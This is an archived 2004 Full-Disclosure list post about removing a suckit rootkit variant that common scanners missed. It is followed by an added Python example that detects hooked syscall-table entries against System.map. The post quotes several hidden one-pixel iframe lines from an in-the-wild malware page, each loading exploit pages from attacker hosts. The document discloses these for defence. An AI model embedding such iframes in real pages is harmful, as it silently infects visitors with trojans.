Re: [Full-Disclosure] xpire.info & splitinfinity.info - exploits in the wild

From: Elia Florio (eflorio_at_edmaster.it)
Date: 10/27/04

  • Next message: Thierry Carrez: "[ GLSA 200410-22 ] MySQL: Multiple vulnerabilities"
    To: <full-disclosure@lists.netsys.com>
    Date: Wed, 27 Oct 2004 01:22:06 +0200
    
    

    Finally, I cleaned the compromised box of my friend :))
    I've found (following many helpful suggestions from people on the FD list)
    that a variant of the "suckit" rootkit was installed on this machine.
    The strange thing is that "rkhunter" and "chkrootkit" don't catch it :((((
    in any way, and they said that everything is ok.

    To find suckit and deactivate it I used this:
    http://tsd.student.utwente.nl/skdetect/
    It's code based on the suckit source code, but without the malware part.
    It can dig into /dev/kmem and explore sys_call_table[];
    skdetect was able to find suckit installed.
    Another person who was compromised by the "xpire.info" hacker told me
    that the symptoms were the same and that on his host he also found this
    suckit variant installed.

    >suckit version 'Q' DETECTED
    >kernel-part uninstall seems successful.

    After reboot everything came back to normal activity.
    Thank you to everyone for the answers given to me
    (Ron DuFresne, Nick FitzGerald, Kevin and others).

    Actually, on the "xpire.info/fa/?d=get" malware page you can find these
    exploits in the wild:

    #IFRAME SRC="http://www.sp2fucked.biz/user28/counter.htm" WIDTH=0 BORDER=0
    HEIGHT=0></IFRAME#
    #iframe src="http://xpire.info/fa/t3.htm" width=1 height=1></iframe#
    #iframe src="http://xpire.info/fa/x.htm" width=1 height=1></iframe#
    #iframe src="http://xpire.info/fa/proc.htm" width=1 height=1></iframe#
    #iframe src="http://xpire.info/fa/runevil.htm" width=1 height=1></iframe#
    #iframe src="http://213.159.117.133/dl/adv121.php" width=1
    height=1></iframe#
    !-- #IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME#
    //-->

    There are a lot of backdoors/trojans ready to install, and the bad news is
    that most of this malware is recompiled, so many AVs are fooled and don't
    catch them (for example Symantec and ClamAV don't recognize much of the
    malware on this site, after a quick test made with www.virustotal.com).

    Bye,
    EF

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
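The check that skdetect performs, as an added example written for this archive page (it is neither skdetect's code nor the poster's): resolve each sys_call_table[] slot against System.map and flag slots whose pointer does not match the kernel's own handler. The System.map excerpt, the syscall-table bytes standing in for what skdetect reads from /dev/kmem, and every address in it are constructed sample data.

```python
"""Spot suckit-style hooks by checking sys_call_table[] against System.map.

A kernel-part rootkit overwrites table slots via /dev/kmem so the kernel jumps
into injected code instead of the real handler. Comparing each slot with the
address System.map lists for that handler exposes the redirected entries.
"""
import struct

# Constructed System.map excerpt for a 32-bit 2.4-era kernel (not real).
SYSTEM_MAP = """\
c0106f40 T sys_fork
c0107010 T sys_execve
c012a3c0 T sys_open
c012a4a0 T sys_read
c012a600 T sys_write
c012b800 T sys_getdents64
c0300000 T sys_call_table
c0400000 A _end
"""

# Syscall numbers for the i386 ABI, as laid out in the kernel's entry.S.
SYSCALLS = {2: "sys_fork", 3: "sys_read", 4: "sys_write", 5: "sys_open",
            11: "sys_execve", 220: "sys_getdents64"}


def parse_system_map(text):
    """Return {address: symbol} for text (code) symbols only."""
    syms = {}
    for line in text.splitlines():
        addr, kind, name = line.split()
        if kind in ("T", "t"):
            syms[int(addr, 16)] = name
    return syms


def build_table(entries, nr_syscalls=256):
    """Stand-in for the bytes read out of /dev/kmem: an array of
    nr_syscalls little-endian 32-bit handler pointers."""
    table = [0] * nr_syscalls
    for nr, addr in entries.items():
        table[nr] = addr
    return struct.pack("<%dI" % nr_syscalls, *table)


def find_hooked(table_bytes, syms, expected=SYSCALLS):
    """Return {nr: (expected_symbol, actual_addr, symbol_at_actual)} for
    every known slot whose pointer is not the handler System.map names."""
    by_name = {name: addr for addr, name in syms.items()}
    slots = struct.unpack("<%dI" % (len(table_bytes) // 4), table_bytes)
    return {nr: (name, slots[nr], syms.get(slots[nr], "<unknown>"))
            for nr, name in expected.items() if slots[nr] != by_name[name]}


def sample_table(hooked=True):
    """Constructed table: clean, or with sys_open and sys_getdents64
    redirected to addresses that carry no kernel text symbol."""
    by_name = {n: a for a, n in parse_system_map(SYSTEM_MAP).items()}
    entries = {nr: by_name[name] for nr, name in SYSCALLS.items()}
    if hooked:
        entries[5], entries[220] = 0xC8012340, 0xC8012560  # constructed
    return build_table(entries)


if __name__ == "__main__":
    syms = parse_system_map(SYSTEM_MAP)
    for nr, (name, actual, at) in sorted(find_hooked(sample_table(), syms).items()):
        print("syscall %3d %-15s -> 0x%08x (%s)" % (nr, name, actual, at))
```

On a real box the table bytes come from /dev/kmem at the address of sys_call_table and the map from the running kernel's System.map, which is why a kernel built without /dev/kmem access defeats both the rootkit and this kind of check.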

